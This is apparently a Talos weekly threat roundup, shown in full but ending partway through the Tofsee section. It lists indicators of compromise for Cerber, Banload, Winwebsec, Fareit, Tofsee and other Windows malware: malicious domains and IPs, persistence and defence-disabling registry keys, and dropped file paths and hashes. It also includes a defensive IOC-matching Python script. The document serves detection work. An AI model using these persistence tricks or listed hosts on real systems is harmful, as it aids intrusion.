Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 29 and Feb. 5. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Ransomware.Cerber-9826975-1 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns other file extensions are used.
Win.Packed.Banload-9827015-0 | Packed | Banload is a banking trojan believed to be developed by Brazilian cybercriminals and used primarily to infect machines in Latin America. One notable aspect of Banload is its use of custom kernel drivers to evade detection.
Win.Trojan.Winwebsec-9828352-0 | Trojan | Winwebsec installs itself on a compromised system as "anti-malware" software with desktop links and various persistence techniques (Windows service, Registry Run key, etc.). This family is known for using fake alerts about malware found on the system to deceive users into buying services before the "malware" can be removed.
Win.Trojan.Fareit-9829230-0 | Trojan | The Fareit trojan is primarily an information stealer that can download and install other malware.
Win.Packed.Tofsee-9827033-0 | Packed | Tofsee is multi-purpose malware that features several modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Spyware.Zbot-9827050-0 | Spyware | Zbot, also known as Zeus, is a trojan that steals information like banking credentials. It contains many malicious features, including keylogging and form-grabbing.
Win.Packed.Razy-9828691-0 | Packed | Razy is often a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data and sends it to a command and control (C2) server. Information collected may include screenshots. The samples set an auto-execute value in the registry for persistence.
Win.Ransomware.Ruskill-9827186-1 | Ransomware | Ruskill, also known as Dorkbot, is a botnet client aimed at stealing credentials and facilitating distributed denial-of-service (DDoS) attacks. It spreads via removable media and through instant messaging applications.
Win.Malware.Python-9827194-0 | Malware | Win.Malware.Python is a generic name given to malware written in Python and, typically, compiled into a Windows executable using tools like PyInstaller. There is a vast array of supporting libraries, proof-of-concept exploit tools, and example code that makes developing malware in Python easier than with lower-level languages. Examples of functionality commonly seen in this type of malware include lateral movement using EternalBlue proof-of-concept scripts and the file encryption performed by ransomware.

Threat Breakdown

Win.Ransomware.Cerber-9826975-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 146 samples
Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: api-PQEC
7
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 7
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Client
5
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
5
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 22
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 23
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 24
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 25
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 26
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 27
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 28
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 29
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 30
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 31
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 32
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 33
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 34
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 35
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 36
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 37
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 38
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 39
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 40
1
<HKCU>\SOFTWARE\GOOGLE\UPDATE\NETWORK\SECURE
Value Name: 41
1
Mutexes | Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 132
shell.{<random GUID>} 24
Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269} 5
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1} 5
Local\{B1443895-5CF6-0B1E-EE75-506F02798413} 5
{<random GUID>} 5
Global\4aEa7aGa9a4aBa6a4a4aBa1a5a8a4a1a 1
Local\4aEa7aGa9a4aBa6a4a4aBa1a5a8a4a1a 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
178[.]128[.]255[.]179 132
91[.]119[.]56[.]0/27 132
91[.]120[.]56[.]0/27 132
91[.]121[.]56[.]0/22 132
104[.]21[.]50[.]61 76
172[.]67[.]2[.]88 53
104[.]20[.]21[.]251 28
172[.]67[.]157[.]138 16
104[.]20[.]20[.]251 15
87[.]106[.]18[.]141 4
54[.]87[.]5[.]88 4
193[.]242[.]211[.]182 2
52[.]21[.]132[.]24 2
104[.]16[.]150[.]172 2
104[.]16[.]148[.]172 2
172[.]67[.]69[.]167 2
239[.]255[.]255[.]250 1
208[.]67[.]222[.]222 1
172[.]86[.]121[.]117 1
104[.]16[.]152[.]172 1
198[.]55[.]100[.]116 1
45[.]56[.]79[.]23 1
224[.]0[.]0[.]1 1
78[.]128[.]92[.]96 1
185[.]85[.]0[.]29 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
api[.]blockcypher[.]com 132
bitaps[.]com 132
btc[.]blockr[.]io 132
chain[.]so 132
maytermsmodiall[.]at 4
bizzixi[.]com 3
sochain[.]com 2
p27dokhpz2n7nvgr[.]1ktjse[.]top 2
cfptfinc[.]org 2
www[.]bing[.]com 1
www[.]torproject[.]org 1
222[.]222[.]67[.]208[.]in-addr[.]arpa 1
myip[.]opendns[.]com 1
resolver1[.]opendns[.]com 1
p27dokhpz2n7nvgr[.]1lseoi[.]top 1
en[.]wikipedia[.]org 1
p27dokhpz2n7nvgr[.]1h23cc[.]top 1
p27dokhpz2n7nvgr[.]1cglxz[.]top 1
d39f23jfph0ylk[.]cloudfront[.]net 1
financeanalytics[.]org 1
www[.]php[.]net 1
Files and/or directories created | Occurrences
%TEMP%\~PI<random, matching [A-F0-9]{2,4}>.tmp 133
%TEMP%\d19ab989 132
%TEMP%\d19ab989\4710.tmp 132
%TEMP%\d19ab989\a35f.tmp 132
%LOCALAPPDATA%\Microsoft\Office\Groove1\System\CSMIPC.dat 132
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 132
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp 132
<dir>\_HELP_HELP_HELP_<random, matching '[A-F0-9]{4,8}'>_.hta 132
<dir>\_HELP_HELP_HELP_<random, matching '[A-F0-9]{4,8}'>_.png 132
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy) 24
%TEMP%\24e2b309\1719.tmp 20
%TEMP%\24e2b309\4436.tmp 20
%APPDATA%\Microsoft\Dmlogpui 7
%APPDATA%\Microsoft\Dmlogpui\datat3hc.exe 7
%TEMP%\<random, matching [A-F0-9]{3,4}> 7
%TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat 7
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\prefs.js 5
%System32%\wbem\Logs\wbemprox.log 4
\I386\COMPDATA\BOSERROR.TXT 4
\I386\RUNW32.BAT 4
\I386\BIOSINFO.INF 4
\I386\COMPDATA\DRVMAIN.INF 4
\I386\COMPDATA\NTCOMPAT.INF 4
\I386\DMREG.INF 4
\I386\DOSNET.INF 4

*See JSON for more IOCs
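The reminder at the top of this roundup, that a single IOC hit does not by itself indicate maliciousness, is easiest to act on when the hunting script already separates strong indicators from sandbox noise. The script below is an added example, not Talos tooling: it loads a handful of the Cerber IP and domain IOCs above in the defanged form they are published in, expands the CIDR ranges, and runs them over a few constructed DNS and connection log lines. The log format, the host names and the NOISE allowlist (multicast, public resolvers and search engines that appear in almost any sandbox run) are assumptions for illustration.

```python
"""Match defanged IOCs (IPs, CIDR ranges, domains) from a Talos roundup against log lines.

Added example for this roundup; not Talos tooling. Log lines, host names and
the NOISE allowlist are constructed for illustration.
"""
import ipaddress
import re
from dataclasses import dataclass, field

# A subset of the Cerber IP and domain IOCs, exactly as published (defanged).
CERBER_IPS = [
    "178[.]128[.]255[.]179", "91[.]119[.]56[.]0/27", "91[.]121[.]56[.]0/22",
    "239[.]255[.]255[.]250", "208[.]67[.]222[.]222",
]
CERBER_DOMAINS = [
    "api[.]blockcypher[.]com", "bitaps[.]com", "chain[.]so",
    "maytermsmodiall[.]at", "p27dokhpz2n7nvgr[.]1ktjse[.]top", "www[.]bing[.]com",
]

# Assumption: indicators that show up in sandbox output for almost any sample
# (SSDP multicast, public resolvers, search engines). Matching one of these
# alone is not evidence of compromise, so hits on them are reported as weak.
NOISE = {"239.255.255.250", "224.0.0.1", "208.67.222.222", "www.bing.com"}


def refang(ioc: str) -> str:
    """Undo the '[.]' defanging used in the tables."""
    return ioc.replace("[.]", ".").strip().lower()


@dataclass
class IocSet:
    networks: list = field(default_factory=list)  # single IPs become /32 networks
    domains: set = field(default_factory=set)

    @classmethod
    def from_lists(cls, ips, domains):
        s = cls()
        for ip in ips:
            s.networks.append(ipaddress.ip_network(refang(ip), strict=False))
        s.domains.update(refang(d) for d in domains)
        return s

    def match_ip(self, ip: str):
        addr = ipaddress.ip_address(ip)
        return [str(n) for n in self.networks if addr in n]

    def match_domain(self, name: str):
        name = name.lower().rstrip(".")
        # exact match, or a subdomain of a listed domain
        return sorted(d for d in self.domains if name == d or name.endswith("." + d))


# Constructed log format: "<time> <host> dns <queried name>" or "<time> <host> conn <dst ip>".
LOG_RE = re.compile(r"^\S+ (?P<host>\S+) (?P<kind>dns|conn) (?P<value>\S+)$")

SAMPLE_LOGS = [
    "10:00:01 ws-17 dns api.blockcypher.com",
    "10:00:02 ws-17 conn 91.121.58.40",       # inside 91.121.56.0/22
    "10:00:03 ws-17 dns www.bing.com",
    "10:00:04 ws-42 conn 239.255.255.250",    # SSDP multicast, seen on most hosts
    "10:00:05 ws-42 dns intranet.example.internal",
]


def hunt(ioc_set: IocSet, log_lines):
    """Return {host: {'strong': [...], 'weak': [...]}} for every host with an IOC hit."""
    report = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host, kind, value = m.group("host"), m.group("kind"), m.group("value")
        hits = ioc_set.match_domain(value) if kind == "dns" else ioc_set.match_ip(value)
        if not hits:
            continue
        bucket = "weak" if value.lower() in NOISE else "strong"
        report.setdefault(host, {"strong": [], "weak": []})[bucket].extend(hits)
    return report


def escalate(report):
    """Hosts that hit at least one non-noise indicator, in sorted order."""
    return sorted(h for h, r in report.items() if r["strong"])


if __name__ == "__main__":
    iocs = IocSet.from_lists(CERBER_IPS, CERBER_DOMAINS)
    result = hunt(iocs, SAMPLE_LOGS)
    for host, hits in result.items():
        print(host, hits)
    print("escalate:", escalate(result))
```

Hosts with at least one strong hit go to triage; a host whose only hits are on allowlisted indicators (here ws-42 talking to SSDP multicast) is reported but not escalated. Tune the allowlist to your own environment before pointing this at real logs, and remember that the CIDR entries in the tables match whole ranges, so a hit on 91.121.56.0/22 is a prompt to look at the full connection, not a verdict.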

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK


Win.Packed.Banload-9827015-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Mutexes | Occurrences
https://s.dynad.net/stack/KMA9C2O70iP6CHSgXk0LGakpYboY3uBSOgotXt8fklCKbdvX2viwKa3R7j7SBAOi.appcache 10
Global\4e21a441-6158-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
200[.]98[.]206[.]56 17
172[.]217[.]3[.]110 15
172[.]217[.]12[.]164 13
13[.]107[.]21[.]200 11
142[.]250[.]80[.]2 11
157[.]240[.]18[.]35 10
34[.]102[.]185[.]99 10
142[.]250[.]111[.]154/31 10
172[.]217[.]3[.]104 9
157[.]240[.]18[.]19 9
200[.]147[.]166[.]107 9
173[.]223[.]57[.]19 9
31[.]13[.]66[.]19 8
172[.]217[.]10[.]230 8
200[.]147[.]166[.]104 7
200[.]147[.]99[.]186 7
172[.]217[.]6[.]206 6
143[.]204[.]150[.]172 6
172[.]217[.]11[.]34 5
172[.]217[.]10[.]138 5
172[.]217[.]9[.]226 5
172[.]217[.]10[.]35 5
151[.]101[.]248[.]157 5
74[.]119[.]119[.]139 5
186[.]234[.]166[.]8 5

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
www[.]bing[.]com 16
stats[.]g[.]doubleclick[.]net 15
www[.]google-analytics[.]com 15
www[.]google[.]com 15
www[.]facebook[.]com 15
connect[.]facebook[.]net 15
www[.]youtube[.]com 10
pagead2[.]googlesyndication[.]com 10
securepubads[.]g[.]doubleclick[.]net 10
b[.]t[.]tailtarget[.]com 10
me[.]jsuol[.]com[.]br 10
s[.]dynad[.]net 10
t[.]dynad[.]net 10
t[.]tailtarget[.]com 10
tm[.]jsuol[.]com[.]br 10
tm[.]uol[.]com[.]br 10
tt-10162-1[.]seg[.]t[.]tailtarget[.]com 10
www[.]instagram[.]com 9
www[.]googletagmanager[.]com 9
twitter[.]com 9
sb[.]scorecardresearch[.]com 9
googleads[.]g[.]doubleclick[.]net 9
adservice[.]google[.]com 9
tracker[.]bt[.]uol[.]com[.]br 9
clicklogger[.]rm[.]uol[.]com[.]br 6

*See JSON for more IOCs

Files and/or directories created | Occurrences
%SystemRoot%\inf\machine1.inf 15
%SystemRoot%\security\~79E6.tmp 3
%SystemRoot%\inf\machinez.inf 2
%TEMP%\~7BA8.tmp 2
%TEMP%\~7BA8files 2
%SystemRoot%\Resources\~7986.tmp 2
%SystemRoot%\SchCache\~79A6.tmp 2
%SystemRoot%\Setup\~7A27.tmp 2
%SystemRoot%\ShellNew\~7A47.tmp 2
%SystemRoot%\Speech\~7A67.tmp 2
%SystemRoot%\SysWOW64\~7A68.tmp 2
%SystemRoot%\TAPI\~7AA8.tmp 2
%SystemRoot%\pss\~7945.tmp 2
%SystemRoot%\schemas\~79A7.tmp 2
%TEMP%\~7BE7.tmp 2
%TEMP%\~7BE7files 2
%SystemRoot%\Vss\~7B76.tmp 2
%SystemRoot%\Web\~7B97.tmp 2
%SystemRoot%\L2Schemas\~79E8.tmp 2
%SystemRoot%\Logs\~7A08.tmp 2
%SystemRoot%\SysWOW64\~7CA9.tmp 2
%SystemRoot%\AppCompat\~76ED.tmp 2
%SystemRoot%\CSC\~7721.tmp 2
%SystemRoot%\Cursors\~7732.tmp 2
%SystemRoot%\Fonts\~7744.tmp 2

*See JSON for more IOCs

File Hashes

0204b13f4c1291b43a448313092c950033a3e90aca2bf3c7be3643c31073d8a5
17b5e62dfe321b46da077148e4dda295c3f2e70ab5d33c2324357de3feec0eee
38e4682bb3b41f766d007f6855c6b89e7cd55780f2117ed0b9bab6f683ae6c35
551752e6431dbc4fcb96de6cc190e80a246e708cbd9b22c937a35b5cbb00362b
5d775811236d96b0e851363ac6c0d4b4c9baf4a0ba6cea808104ecb1c212383c
68f8afc1ce2502a4067bf142cf9484c0298e937ed64d65fa6a1b0944a2f9dd16
7712fc490a58f8a73ebe6bf86c46d88c38815fb9271d58943f6f790020572ace
8cf3085f721a2b952b44941f1c6f607ff73ecb0d2d146eb075a3eb06266eb46a
a5bad3b4f393df83a66515027297378da3c6d7de61572e55c603e031420fb95a
a6f1cabcbf64e60fd79f3800be0035bf6b7ce03dfc26ff9e73a6c6a0210ac993
a86d08279600e9d68e7fa582fd157e76b4769f40bac2bb3de438815307bf5876
a8d5630ff6f7bd1fc47c71a83b01e99b0a2f0a120e60afecaa0417e5dcaf1d5b
be52b8311a9c3ecefd36d84caab444c5d586e49891642248863acd0fe0976cda
d8fd2ca17488db320dd4903a3ea87fe4bd1bc303df128b38ed5baf8fd962ae19
e86786f6262d6b7c1a91174f6f10beebcf3e53289794297ba0d546630c1a5ebd
f40dbbb42a05699f36b51561117fb9986d24f103538f6d56f5fcdb04f38fc715
f5e789e0f97531cf0cb31a47996e1ff0e0fcadd448bc2315ab73f6dea52b4fd6

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Winwebsec-9828352-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LUAFV
Value Name: Start
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE
Value Name: RPSessionInterval
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS DEFENDER
Value Name: DisableAntiSpyware
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: 98BE0FA9BB7E8E3C000098BD76F2948C
25
Mutexes | Occurrences
98BE0FA9BB7E8E3C000098BD76F2948C 25
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
103[.]4[.]225[.]41 21
84[.]22[.]104[.]243 4
Files and/or directories created | Occurrences
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C 25
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C\98BE0FA9BB7E8E3C000098BD76F2948C.exe 25
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C\98BE0FA9BB7E8E3C000098BD76F2948C.ico 25

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Fareit-9829230-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 24 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: cjKyMxqb
2
<HKCU>\SOFTWARE\WINRAR 1
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 1
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
1
<HKCU>\SOFTWARE\REMCOS-7LL9MF 1
<HKCU>\SOFTWARE\REMCOS-7LL9MF
Value Name: licence
1
<HKCU>\SOFTWARE\REMCOS-7LL9MF
Value Name: exepath
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mRkdKTfz
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
1
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
1
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
1
Mutexes | Occurrences
3749282D282E1E80C56CAE5A 9
rc/Administrator 2
Remcos_Mutex_Inj 1
Remcos-7LL9MF 1
Global\{a6e61a20-8b7b-40bb-85f9-f6b72081971b} 1
Global\92a631e1-6620-11eb-b5f8-00501e3ae7b6 1
Global\8fbfc361-6620-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
107[.]175[.]150[.]73 6
172[.]217[.]11[.]14 2
173[.]194[.]207[.]139 1
173[.]194[.]66[.]94 1
91[.]195[.]240[.]117 1
209[.]85[.]232[.]95 1
209[.]85[.]201[.]94 1
173[.]194[.]175[.]101 1
79[.]134[.]225[.]53 1
23[.]21[.]126[.]66 1
23[.]21[.]252[.]4 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
drive[.]google[.]com 2
api[.]ipify[.]org 2
kdi-kongsberg[.]com 1
fiftint[.]com 1
grace2020[.]ddns[.]net 1
mirrapl[.]com 1
aladebtrading[.]com 1
Files and/or directories created | Occurrences
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 14
%APPDATA%\D282E1\1E80C5.lck 9
%TEMP%\<random GUID> 7
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\sgbns.vbs 2
%APPDATA%\sgbns\totio.exe 2
%APPDATA%\sgbns\totio.exe:ZoneIdentifier 2
%APPDATA%\ozNUjFt\SSKEP.exe 2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator 1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\mercy.vbs 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe.vbs 1
%TEMP%\FB_2CD7.tmp 1
%APPDATA%\mercy\dghfdhfgd.exe 1
%APPDATA%\OLPLgIc\MujEa.exe 1
%APPDATA%\mercy\dghfdhfgd.exe:ZoneIdentifier 1
%APPDATA%\Host Process for Windows Tasks 1
%TEMP%\FB_2CD7.tmp.exe 1
%TEMP%\FB_2F67.tmp 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Host Process for Windows Tasks .vbs 1
%TEMP%\FB_2F67.tmp.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SLKT2020020303JPR.vbs 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\CHA21012020102114.vbs 1
%TEMP%\1208794669.bat 1

File Hashes

04da4e4af99a2e4ce39a6249a43f8bf43e44b394c1237cf5298ab6dd3dd733e7
2a1596202915dee55d0307006e6a23b8eb89211e5111c1013c25eaa1f4645683
365ff4c919709767c315b4db9f4ae10f943838b5edb6a47110e9f90a69ddf05e
3a29a92cbd2cbf6f737457ea6944e961af7e6c08d52fd4b5d028303ca390a5e3
3dbf27ce28f414ce08ee9a29533ec17f1f6858dd24aa1c29a494ba8272b8a473
539dcba0f140a20d5ae0222fe6a957aeacd4578230f645c7d194c68efaa53f5e
5add9ca5b092c72b4db0093aa029ffed37b38964a03d7ac64133a5cf65088194
6ab11743bc367e253cd2fb037691854fda077bc0b03202c21ee80d8ad0b58595
6ca536eac48bf749534c57baad735654eaa62e9b22023354477489c1f3717575
6f8e735dde1b30d157d5fd1a4aea08b67ef34e418dfeb961cb79ddb9ff401043
70999eeda65c2a17c1e246be6c9074a07da075eef40a96f47807555b3ef541d6
7ad23e9606d9ef7e717320f211a3b18d9e2601472c4a84567bcc32f504467e2f
850d741fc7017b873ce6834625e306526854c0d88f81a3e162f908b9a8107008
936652a60c5e8577b3dbeb5c0e17e6a757f54b6b3e20cde9a5e6ffe3db632bea
9bb967cdbd3a21565c46969b8194bc486f8720bc1feaedd4b11e9a553e0d6451
cc229b8e20843e2fd6b30beff3bcd7e1eb80fc89f9b88415b7fb76c00f2a5552
d33f2b86f571fbc2b359969cde1ccff467b3e57b77efcf3f13abf069b213ed91
d53923d2d9ab9cc573f32655614d78b94873dce1f7a8745407f58e9edf72ac1f
d861cd5f6496be06f710d5f3a09e0d361ff8efceeb4a0c98d328bd263df72a90
db1d8524d1ba781654ff5ff132c7bed2c1f3d8767c941a64d9af96aa703a5268
e010d7616fea2b40f3ea3db5157ca8f29d80a353fd2bd4a6cd3734d55f42e4fc
ec6723baba12d7ca4ba3efa1a96f208a7d6a990ac3fc3f393ce05770dbf80fc8
f494f9184a467b80bf0b654c0d8f92c454e3c04030751fec3c8a90e0d591723c
f973c47447f9ccb93ef9bcef7b17bf5cc7f8a1f49b811e753b8af1afa384d671

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Tofsee-9827033-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Registry Keys | Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
14
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
14
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
14
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
11
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nguazhnc
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\kdrxwekz
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\yrflksyn
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\unbhgouj
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ibpvucix
1
